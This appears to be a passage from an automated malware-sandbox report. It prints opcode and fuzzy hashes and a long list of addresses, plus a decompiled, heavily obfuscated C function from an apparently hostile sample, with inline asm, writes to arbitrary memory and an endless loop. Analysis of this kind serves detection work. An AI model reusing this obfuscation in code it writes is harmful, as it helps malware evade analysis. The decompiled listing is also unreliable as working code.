                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: b79758d629f46ca4a4b341ce9168ee03fafd343129e0272f2426d9c259b7ff8a
                                                                                                                                                              • Instruction ID: 2dddc7a21a6bf0a2f5775369b97984a921756fff5fed35dd86069e3342ab08fd
                                                                                                                                                              • Opcode Fuzzy Hash: b79758d629f46ca4a4b341ce9168ee03fafd343129e0272f2426d9c259b7ff8a
                                                                                                                                                              • Instruction Fuzzy Hash: 6412EF702992518BDB28DF29C484776B7E4BF15300F14C89BE8D68F792D338E851DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0041BA02, Relevance: .5, Instructions: 489COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                              			E0041BA02() {
				signed int _t57;
				signed char _t59;
				signed int _t71;
				signed int _t72;
				void* _t85;
				signed int _t91;
				signed char _t96;
				signed int _t99;
				signed int _t105;
				signed int _t107;
				signed int _t113;
				signed int _t114;
				signed int _t115;
				void* _t118;
				signed int _t119;
				signed int _t124;
				signed int _t125;
				signed int _t131;
				signed int _t133;

				es =  *_t72;
				_t59 = _t57 & 0xe205d3e9 | 0xd3e71f81;
				asm("rol dword [0xddff5507], 0x9b");
				_t119 = _t118 + 1;
				 *0x722c52a =  *0x722c52a ^ _t59;
				asm("rol dword [0x46cb086f], 0xc");
				 *0x722c737 = _t131;
				 *0x40989914 =  *0x40989914 - _t85;
				asm("adc esi, [0x722c93d]");
				 *0xf8a30810 =  *0xf8a30810 << 0x76;
				 *0xa10822d1 =  *0xa10822d1 & _t119;
				 *0x79ab3021 =  *0x79ab3021 >> 0x79;
				 *0x2a27b5dd = _t119;
				asm("adc ecx, [0x9b2adce]");
				_push(_t119 +  *0x4108b2a9);
				asm("rol byte [0x2d205fb3], 0xf6");
				asm("adc eax, 0x1093f09");
				 *0x3880e707 =  *0x3880e707 << 0x1d;
				asm("adc [0x6d0a2d1b], ebx");
				_push(_t96);
				asm("adc [0x232906e3], bl");
				_t115 = _t114 ^ 0x0bdafcc4;
				_t107 = 0xecd4c2f8;
				asm("rcl dword [0x3769cf2b], 0xb");
				 *0x896ebc9 =  *0x896ebc9 << 0xdb;
				asm("sbb esp, [0xd0287795]");
				 *0xb2b5b32a =  *0xb2b5b32a & _t59;
				asm("adc edi, [0xc11b3711]");
				_t60 = _t59 + 1;
				asm("adc dl, 0xe7");
				_push(0x158c4c1b);
				 *0x53a11ef5 =  *0x53a11ef5 << 0x2b;
				_t74 = (_t72 | 0x4433093b) ^ 0x00000014;
				 *0x512247a3 =  *0x512247a3 & _t74;
				_t133 =  *0x722c737 &  *0x2bd824c0;
				_t91 =  *0xfaa786a * 0xea78;
				_t97 = _t96 | 0x000000b0;
				_push(_t59 + 1);
				_t124 = _t97;
				 *0x3012e2ed =  *0x3012e2ed | _t133;
				 *0xb06ae820 =  *0xb06ae820 ^ _t97;
				asm("stosb");
				if( *0xb06ae820 < 0) {
					__eax = __eax | 0xf2000d71;
					__edi = __edi - 0x9278ffd;
					__ebx = __ebx + 0x760cf036;
					asm("adc ecx, 0xf345830b");
					__ah = __ah +  *0xa5b00b3;
					__ecx =  *0x96d6e5dc;
					asm("sbb ecx, [0x7ca7b206]");
					_push(0xecd4c2f8);
					__ecx =  *0x96d6e5dc &  *0xd60ce6bf;
					 *0x2beb6ff4 =  *0x2beb6ff4 << 3;
					asm("sbb [0xbe3c8761], ebx");
					asm("adc esp, 0x7e070fba");
					__ebx = __ebx + 1;
					asm("rcl byte [0xa793b08], 0x4e");
					__bh = __bh + 0x22;
					__ebx = __ebx |  *0xc6640516;
					asm("sbb ebx, 0xc57f8d07");
					 *0x869c3f83 = __ecx;
					__esi = __esi +  *0x817db88c;
					 *0x118593df =  *0x118593df >> 0x4c;
					if( *0x118593df <= 0) {
						__eax = __eax - 1;
						_push(__edx);
						__al = __al | 0x00000020;
						asm("movsw");
						asm("ror dword [0xf20ceb8d], 0x4e");
						__ebp = __ebp +  *0x64eb6819;
						_push(__ebx);
						__bl = 0x1c;
						__ebp = __ebp ^  *0x2a98560f;
						if(0x1367092d >= 0) {
							__ebx =  *0x4b478e7c * 0x7b5c;
							 *0x19177b2 =  *0x19177b2 - 0x1c;
							if( *0x19177b2 == 0) {
								_push( *0x12f5487b);
								asm("sbb [0x16b081b5], cl");
								 *0x8eda5661 =  *0x8eda5661 & __esp;
								__ebp =  *0x9d106a69 * 0xe52;
								asm("rcl dword [0x286412d4], 0xee");
								_push(__ebx);
								asm("adc ch, 0xb1");
								asm("rol dword [0xf05aeaa3], 0x4");
								__ecx = __ecx ^  *0xf3f6d9f4;
								__esi = __esi | 0xd5dee60d;
								__eax = __eax ^  *0x38ce25cf;
								if(__eax == 0) {
									asm("adc edi, [0xff14637a]");
									__ebp = __ebp -  *0x41f54ef5;
									asm("adc dh, [0x1ef2b71a]");
									 *0x734d2f6 =  *0x734d2f6 & __dl;
									__bh = 0x86;
									_push(__eax);
									asm("adc ebp, 0x301f0e29");
									 *0x76c491f3 =  *0x76c491f3 + __ecx;
									_push(__ebx);
									__ebx = __ebx - 1;
									__ecx = __ecx + 1;
									_push(__esi);
									L1();
									__esi = 0xf4e6c0e8;
									__ecx =  *0x3293686a * 0xa086;
									_t43 = __edx;
									__edx =  *0xa51a2dd5;
									 *0xa51a2dd5 = _t43;
									 *0xeb09139d =  *0xeb09139d << 0x3f;
									L1();
									__ebx = __ebx -  *0x4d80c9e8;
									if(( *0x529b261a & 0x0000001c) >= 0) {
										__esi = 0xfffffffffeeef2fa;
										__ebp = __ebp ^  *0xf22f2a3d;
										if(__ebp < 0) {
											__edi =  *0x210e757d * 0xb6f1;
											__bh =  *0xe228752c;
											if( *0x210e757d * 0xb6f1 >= 0) {
												__esi = 0x663f918a;
												__esp = __esp ^  *0x11a85f9c;
												 *0x787fa3de =  *0x787fa3de - __esp;
												 *0x4ad615b7 =  *0x4ad615b7 + __al;
												__dl = __dl &  *0x159a26b5;
												_push(__ebx);
												__esi = 0x663f918a |  *0xae923319;
												__bl = 0x1c +  *0x7a8b08a0;
												__cl = __cl + 0xf6;
												__esi = 0x663f918a |  *0xae923319 |  *0xdd2dccfa;
												__ch = __ch ^ 0x000000a8;
												__ebp = __ebp &  *0xdcc1ba83;
												 *0x5a9eee6 =  *0x5a9eee6 | __cl;
												if( *0x5a9eee6 >= 0) {
													__esp = __esp +  *0x44b83129;
													__ah =  *0xd0801ab2;
													__edx = __edx ^  *0x78d830ea;
													asm("rol byte [0x8c7c07b1], 0xc7");
													asm("adc ecx, [0xa43db9f4]");
													 *0x68bfdcba =  *0x68bfdcba | __ecx;
													asm("sbb [0xc14e9deb], eax");
													_push(__edx);
													__edi = 0x68dd578c;
													asm("rcl dword [0x8d8c0813], 0xe5");
													__dl = __dl | 0x0000003c;
													__al = __al - 0xb7;
													__dh = __dh - 0x86;
													__esi = __esi + 0x15b2bacc;
													__ebx = __ebx &  *0xe9aa2164;
													__edx = __edx | 0x4a195561;
													__esp = __esp + 1;
													__ch = __ch - 0x20;
													_push(__esp);
													_t50 = __bl;
													__bl =  *0x2f63ed8a;
													 *0x2f63ed8a = _t50;
													__esi =  *0x299b07d3;
													__eax = __eax | 0xab0b8395;
													_t51 = __ebx;
													__ebx =  *0x3805346e;
													 *0x3805346e = _t51;
													__ebx =  *0x3805346e -  *0xfe0b4285;
													asm("rcl byte [0x321196e3], 0xa1");
													_push( *0xff97edd5);
													_t52 = __esp;
													__esp =  *0xd0ca8adf;
													 *0xd0ca8adf = _t52;
													asm("ror dword [0x8f97990d], 0x98");
													asm("adc esi, 0x53998633");
													_pop( *0x67bf370f);
													__edx = __edx + 0xeac19633;
													asm("adc ebx, [0xb32b3c9c]");
													 *0xae99220c =  *0xae99220c << 0x76;
													asm("adc ecx, 0x19a770c4");
													__esi =  *0x299b07d3 +  *0xbd1b190f;
													__cl = 0xd7;
													__edi =  *0x6d7fa166;
													 *0x6d7fa166 = 0x68dd578c;
													__eax =  *0x189f4985;
													if(__ebp == 0) {
														__edx =  *0x21e8b594;
														 *0xb8122f2b =  *0xb8122f2b ^ __ebx;
														__edx =  *0x21e8b594 - 1;
														__esp = __esp - 1;
														if( *0x21e8b594 - 1 <= 0) {
															__ecx =  *0x3e29c27f * 0xc4d1;
															_t54 = __al;
															__al =  *0xbd32f2b5;
															 *0xbd32f2b5 = _t54;
															__edx =  *0x2a3fbe6a * 0xf76;
															asm("adc [0xe6033eb7], dl");
															asm("rcl byte [0x1a4e7a18], 0x90");
															_push(__esi);
															L1();
															asm("rol dword [0x6319f6e8], 0x64");
															asm("adc cl, [0xfcb362b3]");
															__eax = __eax ^  *0xa942e262;
															asm("rcr byte [0xb46cd018], 0x5b");
															asm("movsb");
															__eax = __eax |  *0xe8b5ccdb;
															__edx =  *0x2a3fbe6a * 0x00000f76 & 0x092f2b21;
															if(__edx > 0) {
																__ebp =  *0x3af9317e * 0x40cf;
																_t55 = __edi;
																__edi =  *0xf2d2239;
																 *0xf2d2239 = _t55;
																__edx = __edx + 1;
																 *0x1c37c8eb =  *0x1c37c8eb | __ebx;
																__esi = 0x6c2da08d;
																 *0x3c9ceac1 =  *0x3c9ceac1 >> 0xd7;
																__eax = __eax &  *0x6114b32b;
																__ah = 2;
																__esi = 0x6c2da08d ^  *0x1905a0d;
																asm("sbb ebx, 0x75f59c8e");
																asm("sbb ebx, 0x6f07c707");
																 *0x610be2f2 =  *0x610be2f2 | 0x00000002;
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
				L1:
				_t133 = _t133 + 0x60a5d109;
				_push(_t91);
				asm("sbb eax, 0xe1100d2d");
				_t74 = _t74 | 0x000000b4;
				if(_t74 >= 0) {
					asm("ror dword [0xe6d76578], 0x10");
					_t125 = _t124 ^ 0xbfeb0c05;
					 *0x28ff453a =  *0x28ff453a >> 0x4d;
					asm("movsw");
					 *0xf1d022b0 =  *0xf1d022b0 | _t74;
					asm("adc esi, 0x5a42bbbb");
					asm("sbb ecx, [0xd307be1d]");
					_push( *0x5096aa68);
					 *0xd44df2b6 =  *0xd44df2b6 << 0x7e;
					 *0x104c9dba = _t125;
					asm("sbb ah, [0xb5b44334]");
					asm("sbb [0x55e1ff0a], cl");
					asm("adc bl, [0x9dac3a8]");
					_t99 = _t97 | 0x9e32a692 |  *0x2deac01c;
					asm("sbb eax, 0x400ad305");
					 *0xdb4059ea =  *0xdb4059ea << 0x69;
					 *0xda12699d =  *0xda12699d + _t99;
					asm("rcr dword [0xe185cbd8], 0x29");
					_push((_t74 & 0x541862c0) + 0x00000001 & 0x0000000a);
					_t115 = _t115 ^ 0xcef84265;
					_t124 = _t125 + 0x4066e08d;
					_t74 =  *0x587812b3;
					asm("rcl dword [0x3becb6f4], 0xd6");
					 *0xfaccb638 =  *0xfaccb638 >> 0x68;
					_push(_t74);
					 *0x60645a68 = _t74;
					asm("adc edi, 0x2b7622fe");
					 *0x11f05f9a =  *0x11f05f9a ^ 0x8e77fc03;
					 *0x92411c02 =  *0x92411c02 >> 0xc9;
					_t91 = _t91 - 0x00000001 |  *0xf9485cd4;
					_t60 = 1 +  *0xda136d6a * 0x2a0f;
					 *0xe8a9d582 =  *0xe8a9d582 + _t74;
					_t133 =  *0x187a8c6a * 0x00002860 |  *0x1ae46b96;
					L1();
					_t97 = _t99 | 0xf476b3e8;
					if(_t97 > 0) {
						asm("sbb edi, [0x5d82c126]");
						_t20 = _t107;
						_t107 =  *0xefd21b9c;
						 *0xefd21b9c = _t20;
						asm("rcr dword [0x8b347e0e], 0x83");
						asm("lodsb");
						asm("adc esi, 0xcadecfa3");
						_t97 = 0x4f1ca113;
						asm("sbb [0xde9c0509], ebx");
						asm("adc edi, [0xd23112f3]");
						if(( *0xcb00c276 & _t74) < 0) {
							asm("sbb eax, 0x4aec2b73");
							asm("adc [0xf8f84184], ah");
							_t133 = _t133 ^  *0x4289fd6d |  *0x292a8d89;
							asm("sbb dl, [0x40d8ae3a]");
							 *0x840801ce =  *0x840801ce << 0xdf;
							 *0xaf18b994 = _t115;
							 *0xb183f72b =  *0xb183f72b >> 0xa6;
							 *0x1d9cabca =  *0x1d9cabca << 0x20;
							_t97 =  *0x6d898921 +  *0x4528e3fc;
							asm("adc eax, [0xe82ae92]");
							asm("stosd");
							 *0x631237b9 =  *0x631237b9 << 0x59;
							 *0x84243882 =  *0x84243882 << 0x65;
							if( *0x84243882 < 0) {
								_t115 = _t115 ^  *0xe52aa033;
								asm("movsw");
								 *0x7d7ffdb4 =  *0x7d7ffdb4 >> 0x90;
								asm("lodsd");
								asm("rcl byte [0x579f2dd0], 0x8b");
								_t74 = 0xf2;
								_push(_t60);
								asm("adc cl, 0x2");
								_t124 = (_t124 &  *0xe3261b67) - 0x5378099f;
								asm("rcr byte [0xf8e07722], 0x6b");
								_t91 = _t91 |  *0xb2d2d0c;
								_t60 =  *0x83604569 * 0x15cf;
								_t133 = _t133 ^ 0x267779ed;
								 *0xdf240b96 =  *0xdf240b96 >> 0x5c;
								if(_t133 >= 0) {
									_t115 = _t115 |  *0xbdba6c17;
									_t107 =  *0x3ad4ad6a * 0xc7b3;
									 *0x3d0ea899 =  *0x3d0ea899 << 0x83;
									asm("sbb ebp, 0xbb578cd1");
									_t91 = (_t91 ^ 0xe3728672) + 1;
									 *0xb76fbd39 =  *0xb76fbd39 << 0x32;
									asm("adc esi, [0xa8b14d1b]");
									asm("rcr dword [0xb8e8f483], 0xff");
									asm("adc ecx, [0x6092bff4]");
									 *0x12762201 =  *0x12762201 - _t97;
									_t60 = (_t60 ^  *0x267778ee) +  *0x3a74b112 | 0x1bf2f02d;
									_push( *0xfe0fce81);
									_t74 = 0xf2;
									if(_t97 >  *0x23fe4a9b) {
										_t133 = _t133 ^  *0xaa0c0d76;
										 *0x66507286 =  *0x66507286 << 0x4e;
										 *0xa97d9bd2 =  *0xa97d9bd2 << 0x5d;
										_t107 = _t107 +  *0xa96f5919 - 1;
										asm("rcl dword [0xae2d3a07], 0x2c");
										 *0x22feaf6e =  *0x22feaf6e >> 0x97;
										 *0x6505c09 =  *0x6505c09 << 0x55;
										_pop(_t91);
										asm("adc [0x3879c9c0], ebp");
										_t115 = _t115 | 0xed080a2d;
										_t74 =  *0x9e127e32 +  *0xe18f3a81;
										asm("ror dword [0xda2545bf], 0xe");
										 *0xa676017 =  *0xa676017 ^ _t115;
										_t124 = _t124 +  *0x839e72b8;
										if(_t124 == 0) {
											asm("sbb [0x8ee40e1b], eax");
											_t115 =  *0x22e75435;
											asm("adc [0xf02f2314], dh");
											asm("adc [0xc6dfaf9], ch");
											_pop(_t133);
											 *0x427609c0 = _t60;
											asm("adc ebp, 0x129f032e");
											 *0x5ebcd7f4 =  *0x5ebcd7f4 & _t115;
											_t74 = _t74 + 0xbb83bbc7;
											asm("cmpsw");
											asm("adc [0x3c77a686], ch");
											 *0xfbbc2d31 =  *0xfbbc2d31 >> 0x45;
											if( *0xfbbc2d31 > 0) {
												asm("rcl byte [0x1cac5ab4], 0xba");
												asm("rcl byte [0x7cf4a504], 0xd5");
												asm("sbb edi, 0xf9e01ce");
												asm("adc [0x705b0c65], ebx");
												asm("adc esi, 0x5d7d34de");
												_t133 = _t133 + 1;
												 *0xd3aea027 =  *0x48842d10;
												 *0xe0118c01 =  *0xe0118c01 << 0xa4;
												_push( *0x4c64bcff);
												_t91 = _t91 - 0x89443bc4 -  *0x87962cdf;
												asm("adc bl, 0x80");
												asm("sbb dh, 0x14");
												 *0xa27872dc = _t133;
												asm("ror dword [0xeab3b317], 0x7e");
												 *0x73dc9a13 =  *0x73dc9a13 << 0x96;
												_t71 = 0x6c6009aa ^  *0x3e8309f5;
												 *0xaa86d0 =  *0xaa86d0 << 0x93;
												_t115 = _t115 |  *0x3d7baf3e;
												asm("adc ebx, [0x8c2c0a9c]");
												asm("adc edx, [0xd030a0de]");
												_t113 =  *0x7c0b5e1f;
												asm("sbb esi, 0x40051f7");
												_t105 =  *0x52dd2560 * 0x88e;
												 *0xb5d505d2 =  *0xb5d505d2 - _t105;
												_pop( *0x2c9cd73e);
												_pop(_t124);
												asm("rol dword [0xb5c0cb65], 0x21");
												 *0x52174c1 = _t113;
												asm("rol dword [0xfa47a9c0], 0xf9");
												asm("sbb esi, [0xafcc05d3]");
												_push(_t71);
												_t60 =  *0x9c05d302;
												 *0x9c05d302 = _t71;
												asm("sbb [0xd3e9288f], ebp");
												 *0xe2e81005 =  *0xe2e81005 << 0x9a;
												 *0xdc05d3fd =  *0xdc05d3fd | _t113;
												_t74 =  *0xd3fbdedf;
												_t107 = _t113 | 0x228e8805;
												_t97 = _t105 -  *0xcf03d3eb;
												if(_t97 == 0) {
													asm("rol dword [0xab04bb7b], 0x1e");
													 *0x431373f =  *0x431373f ^ _t107;
													_t107 = _t107 ^  *0x313446a3;
													 *0x3a6ca904 = _t60;
													 *0x75ee0431 =  *0x75ee0431 & _t133;
													_t97 = _t97 |  *0xab05313c;
													asm("sbb esp, 0xd3ef2567");
												}
											}
										}
									}
								}
							}
						}
					}
				}
				goto L1;
			}






















                                                                                                                                                              0x0041ba07
                                                                                                                                                              0x0041ba09
                                                                                                                                                              0x0041ba0e
                                                                                                                                                              0x0041ba15
                                                                                                                                                              0x0041ba16
                                                                                                                                                              0x0041ba1c
                                                                                                                                                              0x0041ba23
                                                                                                                                                              0x0041ba29
                                                                                                                                                              0x0041ba2f
                                                                                                                                                              0x0041ba36
                                                                                                                                                              0x0041ba3d
                                                                                                                                                              0x0041ba43
                                                                                                                                                              0x0041ba60
                                                                                                                                                              0x0041ba75
                                                                                                                                                              0x0041ba81
                                                                                                                                                              0x0041ba82
                                                                                                                                                              0x0041ba89
                                                                                                                                                              0x0041ba91
                                                                                                                                                              0x0041baa5
                                                                                                                                                              0x0041baac
                                                                                                                                                              0x0041baad
                                                                                                                                                              0x0041bab3
                                                                                                                                                              0x0041bab9
                                                                                                                                                              0x0041babf
                                                                                                                                                              0x0041bac6
                                                                                                                                                              0x0041bacd
                                                                                                                                                              0x0041bad3
                                                                                                                                                              0x0041bad9
                                                                                                                                                              0x0041badf
                                                                                                                                                              0x0041bae6
                                                                                                                                                              0x0041bae9
                                                                                                                                                              0x0041baee
                                                                                                                                                              0x0041baf5
                                                                                                                                                              0x0041baf8
                                                                                                                                                              0x0041bafe
                                                                                                                                                              0x0041bb04
                                                                                                                                                              0x0041bb0e
                                                                                                                                                              0x0041bb11
                                                                                                                                                              0x0041bb13
                                                                                                                                                              0x0041bb14
                                                                                                                                                              0x0041bb1a
                                                                                                                                                              0x0041bb20
                                                                                                                                                              0x0041bb21
                                                                                                                                                              0x0041bb27
                                                                                                                                                              0x0041bb2c
                                                                                                                                                              0x0041bb32
                                                                                                                                                              0x0041bb38
                                                                                                                                                              0x0041bb3e
                                                                                                                                                              0x0041bb44
                                                                                                                                                              0x0041bb4a
                                                                                                                                                              0x0041bb50
                                                                                                                                                              0x0041bb51
                                                                                                                                                              0x0041bb57
                                                                                                                                                              0x0041bb5e
                                                                                                                                                              0x0041bb65
                                                                                                                                                              0x0041bb6b
                                                                                                                                                              0x0041bb6c
                                                                                                                                                              0x0041bb73
                                                                                                                                                              0x0041bb76
                                                                                                                                                              0x0041bb82
                                                                                                                                                              0x0041bb88
                                                                                                                                                              0x0041bb8e
                                                                                                                                                              0x0041bb94
                                                                                                                                                              0x0041bb9b
                                                                                                                                                              0x0041bba7
                                                                                                                                                              0x0041bba8
                                                                                                                                                              0x0041bba9
                                                                                                                                                              0x0041bbab
                                                                                                                                                              0x0041bbad
                                                                                                                                                              0x0041bbb4
                                                                                                                                                              0x0041bbba
                                                                                                                                                              0x0041bbbb
                                                                                                                                                              0x0041bbbd
                                                                                                                                                              0x0041bbc3
                                                                                                                                                              0x0041bbc9
                                                                                                                                                              0x0041bbd3
                                                                                                                                                              0x0041bbd9
                                                                                                                                                              0x0041bbdf
                                                                                                                                                              0x0041bbe5
                                                                                                                                                              0x0041bbeb
                                                                                                                                                              0x0041bbf1
                                                                                                                                                              0x0041bbfb
                                                                                                                                                              0x0041bc08
                                                                                                                                                              0x0041bc09
                                                                                                                                                              0x0041bc12
                                                                                                                                                              0x0041bc1f
                                                                                                                                                              0x0041bc25
                                                                                                                                                              0x0041bc2b
                                                                                                                                                              0x0041bc31
                                                                                                                                                              0x0041bc37
                                                                                                                                                              0x0041bc3d
                                                                                                                                                              0x0041bc43
                                                                                                                                                              0x0041bc49
                                                                                                                                                              0x0041bc4f
                                                                                                                                                              0x0041bc54
                                                                                                                                                              0x0041bc55
                                                                                                                                                              0x0041bc5b
                                                                                                                                                              0x0041bc61
                                                                                                                                                              0x0041bc62
                                                                                                                                                              0x0041bc63
                                                                                                                                                              0x0041bc64
                                                                                                                                                              0x0041bc65
                                                                                                                                                              0x0041bc6a
                                                                                                                                                              0x0041bc6f
                                                                                                                                                              0x0041bc79
                                                                                                                                                              0x0041bc79
                                                                                                                                                              0x0041bc79
                                                                                                                                                              0x0041bc7f
                                                                                                                                                              0x0041bc86
                                                                                                                                                              0x0041bc8b
                                                                                                                                                              0x0041bc97
                                                                                                                                                              0x0041bc9d
                                                                                                                                                              0x0041bca3
                                                                                                                                                              0x0041bca9
                                                                                                                                                              0x0041bcaf
                                                                                                                                                              0x0041bcb9
                                                                                                                                                              0x0041bcbf
                                                                                                                                                              0x0041bcc5
                                                                                                                                                              0x0041bccb
                                                                                                                                                              0x0041bcd1
                                                                                                                                                              0x0041bcd7
                                                                                                                                                              0x0041bcdd
                                                                                                                                                              0x0041bce9
                                                                                                                                                              0x0041bcea
                                                                                                                                                              0x0041bcf0
                                                                                                                                                              0x0041bcf6
                                                                                                                                                              0x0041bcf9
                                                                                                                                                              0x0041bcff
                                                                                                                                                              0x0041bd02
                                                                                                                                                              0x0041bd08
                                                                                                                                                              0x0041bd0e
                                                                                                                                                              0x0041bd1a
                                                                                                                                                              0x0041bd2c
                                                                                                                                                              0x0041bd32
                                                                                                                                                              0x0041bd38
                                                                                                                                                              0x0041bd3f
                                                                                                                                                              0x0041bd45
                                                                                                                                                              0x0041bd4b
                                                                                                                                                              0x0041bd51
                                                                                                                                                              0x0041bd52
                                                                                                                                                              0x0041bd57
                                                                                                                                                              0x0041bd5e
                                                                                                                                                              0x0041bd61
                                                                                                                                                              0x0041bd63
                                                                                                                                                              0x0041bd66
                                                                                                                                                              0x0041bd6c
                                                                                                                                                              0x0041bd72
                                                                                                                                                              0x0041bd78
                                                                                                                                                              0x0041bd79
                                                                                                                                                              0x0041bd7c
                                                                                                                                                              0x0041bd7d
                                                                                                                                                              0x0041bd7d
                                                                                                                                                              0x0041bd7d
                                                                                                                                                              0x0041bd83
                                                                                                                                                              0x0041bd89
                                                                                                                                                              0x0041bd8e
                                                                                                                                                              0x0041bd8e
                                                                                                                                                              0x0041bd8e
                                                                                                                                                              0x0041bd94
                                                                                                                                                              0x0041bd9a
                                                                                                                                                              0x0041bda1
                                                                                                                                                              0x0041bda7
                                                                                                                                                              0x0041bda7
                                                                                                                                                              0x0041bda7
                                                                                                                                                              0x0041bdad
                                                                                                                                                              0x0041bdb4
                                                                                                                                                              0x0041bdba
                                                                                                                                                              0x0041bdc6
                                                                                                                                                              0x0041bdcc
                                                                                                                                                              0x0041bdd2
                                                                                                                                                              0x0041bddf
                                                                                                                                                              0x0041bde5
                                                                                                                                                              0x0041bdeb
                                                                                                                                                              0x0041bded
                                                                                                                                                              0x0041bded
                                                                                                                                                              0x0041bdf3
                                                                                                                                                              0x0041bdfe
                                                                                                                                                              0x0041be0a
                                                                                                                                                              0x0041be10
                                                                                                                                                              0x0041be16
                                                                                                                                                              0x0041be17
                                                                                                                                                              0x0041be18
                                                                                                                                                              0x0041be1e
                                                                                                                                                              0x0041be28
                                                                                                                                                              0x0041be28
                                                                                                                                                              0x0041be28
                                                                                                                                                              0x0041be2e
                                                                                                                                                              0x0041be38
                                                                                                                                                              0x0041be3e
                                                                                                                                                              0x0041be51
                                                                                                                                                              0x0041be52
                                                                                                                                                              0x0041be57
                                                                                                                                                              0x0041be5e
                                                                                                                                                              0x0041be64
                                                                                                                                                              0x0041be6a
                                                                                                                                                              0x0041be71
                                                                                                                                                              0x0041be72
                                                                                                                                                              0x0041be78
                                                                                                                                                              0x0041be7e
                                                                                                                                                              0x0041be84
                                                                                                                                                              0x0041be8e
                                                                                                                                                              0x0041be8e
                                                                                                                                                              0x0041be8e
                                                                                                                                                              0x0041be94
                                                                                                                                                              0x0041be95
                                                                                                                                                              0x0041be9b
                                                                                                                                                              0x0041bea1
                                                                                                                                                              0x0041bea8
                                                                                                                                                              0x0041beae
                                                                                                                                                              0x0041beb6
                                                                                                                                                              0x0041bebc
                                                                                                                                                              0x0041bec2
                                                                                                                                                              0x0041bec8
                                                                                                                                                              0x0041bec8
                                                                                                                                                              0x0041be7e
                                                                                                                                                              0x0041be18
                                                                                                                                                              0x0041bdfe
                                                                                                                                                              0x0041bd0e
                                                                                                                                                              0x0041bcbf
                                                                                                                                                              0x0041bca9
                                                                                                                                                              0x0041bc97
                                                                                                                                                              0x0041bc31
                                                                                                                                                              0x0041bbd9
                                                                                                                                                              0x0041bbc3
                                                                                                                                                              0x0041bb9b
                                                                                                                                                              0x0041b4a6
                                                                                                                                                              0x0041b4a6
                                                                                                                                                              0x0041b4b1
                                                                                                                                                              0x0041b4b2
                                                                                                                                                              0x0041b4bd
                                                                                                                                                              0x0041b4c0
                                                                                                                                                              0x0041b4c2
                                                                                                                                                              0x0041b4ca
                                                                                                                                                              0x0041b4d0
                                                                                                                                                              0x0041b4d7
                                                                                                                                                              0x0041b4d9
                                                                                                                                                              0x0041b4e5
                                                                                                                                                              0x0041b4f1
                                                                                                                                                              0x0041b513
                                                                                                                                                              0x0041b519
                                                                                                                                                              0x0041b527
                                                                                                                                                              0x0041b532
                                                                                                                                                              0x0041b544
                                                                                                                                                              0x0041b550
                                                                                                                                                              0x0041b55c
                                                                                                                                                              0x0041b568
                                                                                                                                                              0x0041b56f
                                                                                                                                                              0x0041b576
                                                                                                                                                              0x0041b57f
                                                                                                                                                              0x0041b587
                                                                                                                                                              0x0041b598
                                                                                                                                                              0x0041b59f
                                                                                                                                                              0x0041b5a5
                                                                                                                                                              0x0041b5ab
                                                                                                                                                              0x0041b5b2
                                                                                                                                                              0x0041b5b9
                                                                                                                                                              0x0041b5ba
                                                                                                                                                              0x0041b5c0
                                                                                                                                                              0x0041b5c6
                                                                                                                                                              0x0041b5d2
                                                                                                                                                              0x0041b5d9
                                                                                                                                                              0x0041b5e5
                                                                                                                                                              0x0041b5f0
                                                                                                                                                              0x0041b5f6
                                                                                                                                                              0x0041b5fc
                                                                                                                                                              0x0041b601
                                                                                                                                                              0x0041b607
                                                                                                                                                              0x0041b613
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b61a
                                                                                                                                                              0x0041b620
                                                                                                                                                              0x0041b627
                                                                                                                                                              0x0041b628
                                                                                                                                                              0x0041b62e
                                                                                                                                                              0x0041b634
                                                                                                                                                              0x0041b63a
                                                                                                                                                              0x0041b640
                                                                                                                                                              0x0041b646
                                                                                                                                                              0x0041b651
                                                                                                                                                              0x0041b657
                                                                                                                                                              0x0041b65d
                                                                                                                                                              0x0041b669
                                                                                                                                                              0x0041b670
                                                                                                                                                              0x0041b682
                                                                                                                                                              0x0041b689
                                                                                                                                                              0x0041b690
                                                                                                                                                              0x0041b696
                                                                                                                                                              0x0041b69c
                                                                                                                                                              0x0041b69d
                                                                                                                                                              0x0041b6a4
                                                                                                                                                              0x0041b6ab
                                                                                                                                                              0x0041b6b7
                                                                                                                                                              0x0041b6bd
                                                                                                                                                              0x0041b6c5
                                                                                                                                                              0x0041b6d2
                                                                                                                                                              0x0041b6d3
                                                                                                                                                              0x0041b6da
                                                                                                                                                              0x0041b6dc
                                                                                                                                                              0x0041b6e3
                                                                                                                                                              0x0041b6ec
                                                                                                                                                              0x0041b6f2
                                                                                                                                                              0x0041b6f9
                                                                                                                                                              0x0041b6ff
                                                                                                                                                              0x0041b709
                                                                                                                                                              0x0041b70f
                                                                                                                                                              0x0041b716
                                                                                                                                                              0x0041b72e
                                                                                                                                                              0x0041b734
                                                                                                                                                              0x0041b73e
                                                                                                                                                              0x0041b745
                                                                                                                                                              0x0041b74b
                                                                                                                                                              0x0041b74c
                                                                                                                                                              0x0041b753
                                                                                                                                                              0x0041b75f
                                                                                                                                                              0x0041b76c
                                                                                                                                                              0x0041b772
                                                                                                                                                              0x0041b778
                                                                                                                                                              0x0041b783
                                                                                                                                                              0x0041b789
                                                                                                                                                              0x0041b792
                                                                                                                                                              0x0041b798
                                                                                                                                                              0x0041b79e
                                                                                                                                                              0x0041b7a6
                                                                                                                                                              0x0041b7c3
                                                                                                                                                              0x0041b7ca
                                                                                                                                                              0x0041b7d1
                                                                                                                                                              0x0041b7d8
                                                                                                                                                              0x0041b7df
                                                                                                                                                              0x0041b7e0
                                                                                                                                                              0x0041b7e6
                                                                                                                                                              0x0041b7ec
                                                                                                                                                              0x0041b7f2
                                                                                                                                                              0x0041b7f9
                                                                                                                                                              0x0041b805
                                                                                                                                                              0x0041b80b
                                                                                                                                                              0x0041b823
                                                                                                                                                              0x0041b82e
                                                                                                                                                              0x0041b834
                                                                                                                                                              0x0041b83a
                                                                                                                                                              0x0041b840
                                                                                                                                                              0x0041b841
                                                                                                                                                              0x0041b846
                                                                                                                                                              0x0041b84c
